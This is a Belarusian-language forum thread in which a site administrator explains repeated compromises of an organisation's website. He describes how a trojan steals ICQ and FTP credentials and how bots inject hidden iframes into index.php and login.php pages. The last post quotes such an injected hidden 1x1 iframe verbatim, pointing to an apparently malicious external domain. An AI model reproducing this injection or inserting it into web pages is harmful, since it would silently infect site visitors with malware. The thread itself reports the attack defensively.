Выбачайце спадарства. Я не знайшоў куды напісаць, таму пішу ў флейм...
Сёння, калі адчыніў старонку навінаў НРСМ, убачыў вось гэта:
нейкі вірус...
- князь жжош
- Сябар
- Posts: 32
- Joined: 10.06.2007 - 13:21
- Location: Менск
- Contact:
- князь жжош
- Сябар
- Posts: 32
- Joined: 10.06.2007 - 13:21
- Location: Менск
- Contact:
князь жжош, чорт-чорт-чорт! Зноў! Карацей, напрацягу некалькіх тыдняў нас ламаюць. Я нават ведаю як, але з-за праблемаў з хостэрамі, не магу зьмяніць нічога
Карацей, у апошні час тысячы сайтаў былі аднолькавым чынам падламаныя: ў зьмест старонак устаўляецца схаваны фрэйм, які спасылаецца на сайт зь вірусамі, траянамі і г.д. Тое самае ў апошні час адбываецца з нашым сайтам. Спачатку ён быў узламаны цалкам, а зараз проста ціха ўстаўляюць у код iframe, кшталту такога: Цытата:
Карацей, у апошні час тысячы сайтаў былі аднолькавым чынам падламаныя: ў зьмест старонак устаўляецца схаваны фрэйм, які спасылаецца на сайт зь вірусамі, траянамі і г.д. Тое самае ў апошні час адбываецца з нашым сайтам. Спачатку ён быў узламаны цалкам, а зараз проста ціха ўстаўляюць у код iframe, кшталту такога: Цытата:
З чым гэта зьвязана. У ЖЖ я пісаў, што пачаліся масавыя крадзежы асяк. Як апынулася, гэта зьвязана зь нейкім траянам, які адсылае паролі празь дзіркі аські, а яшчэ прычапляе іншыя паролі з сыстэмы, ў тым ліку для ftp (звычайна, файл Total Commander з дадзенымі). А там ужо боты праз ftp грукаюцца на сайты і аўтаматычна ўстаўляюць у коды старонак (звычайна index.php, login.php) сваі фрэймы і, такім чынам, заражаюць іншыя кампутары. Тое самае, напрыклад, было з «Тузінам Гітоў».<iframe src='http://www.alaqiq.net/quran/stata/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
- князь жжош
- Сябар
- Posts: 32
- Joined: 10.06.2007 - 13:21
- Location: Менск
- Contact: